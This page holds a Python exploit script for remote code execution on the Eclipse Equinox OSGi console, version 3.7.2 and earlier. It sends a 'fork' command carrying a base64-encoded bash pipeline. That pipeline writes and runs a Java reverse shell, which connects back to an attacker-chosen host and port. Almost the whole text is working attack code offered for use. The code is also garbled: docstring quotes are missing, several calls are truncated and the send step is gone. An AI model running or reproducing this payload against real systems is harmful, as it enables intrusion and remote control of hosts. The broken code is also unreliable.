OSGi v3.7.2 (and below) Console Exploit, RCE


# Exploit Title: [OSGi v3.7.2 Console RCE]
# Date: [2023-07-28]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
#                  VisionSpace Technologies GmbH]
# Exploit Repository:
#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]
# Vendor Homepage: [https://eclipse.dev/equinox]
# Software Link: [https://archive.eclipse.org/equinox/]
# Version: [3.7.2 and before]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
# Usage:
# python exploit.py --help
# Examples:
# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \
#   --lport=4444
# python exploit.py --rhost=localhost --rport=1337 --payload= \
#   "curl"

This is an exploit that allows to open a reverse shell connection from
the system running OSGi v3.7.2 and earlier.
import argparse
import base64
import socket

def parse():
    This fnction is used to parse and return command-line arguments.

    parser = argparse.ArgumentParser(
        description="This tool will let you open a reverse shell from the "
                    "system that is running OSGi with the '-console' "
                    "option in version 3.7.2 (or before).",
        epilog="Happy Hacking! :)",

    parser.add_argument("--rhost", dest="rhost",
                        help="remote host", type=str, required=True)
    parser.add_argument("--rport", dest="rport",
                        help="remote port", type=int, required=True)
    parser.add_argument("--lhost", dest="lhost",
                        help="local host", type=str, required=False)
    parser.add_argument("--lport", dest="lport",
                        help="local port", type=int, required=False)
    parser.add_argument("--payload", dest="custom_payload",
                        help="custom payload", type=str, required=False)
    parser.add_argument("--version", action="version",
                        version="%(prog)s 0.1.0")

    args = parser.parse_args()

    if args.custom_payload and (args.lhost or args.lport):
            "either --payload or both --lport and --rport are required.")

    return args

def generate_payload(lhost, lport, custom_payload):
    This function generates the whole payload ready for the delivery.

    payload = ""

    if custom_payload:
        payload = custom_payload

        print("(*) Using custom payload.")
    elif lhost and lport:
        payload = \
            "echo 'import java.io.IOException;import java.io.InputStream;" \
            "import java.io.OutputStream;import java.net.Socket;class Rev" \
            "Shell {public static void main(String[] args) throws Excepti" \
            "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \
            "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \
            ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \
            "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \
            "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \
            ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \
            "e(pe.available()>0)so.write(pe.read());while(si.available()>" \
            "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \
            ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \
            ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (
                lhost, lport)

        print("(+) Using Java reverse shell payload.")

    bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (

    wrapped_payload = b"fork \"%s\"\n" % (bash_payload)

    return wrapped_payload

def deliver_payload(rhost, rport, payload):
    This function connects to the target host and delivers the payload.
    It returns True if successful; False otherwise.

    print("(*) Sending payload...")

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((rhost, rport))
    except socket.error as err:
        print(f"(-) Could not deliver the payload to {rhost}:{rport}!")
        return False

    return True

def main(args):
    Main function.

    payload = generate_payload(args.lhost, args.lport, args.custom_payload)

    success = deliver_payload(args.rhost, args.rport, payload)
    if success:
        print("(+) Done.")
        print("(-) Finished with errors.")

if __name__ == "__main__":

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD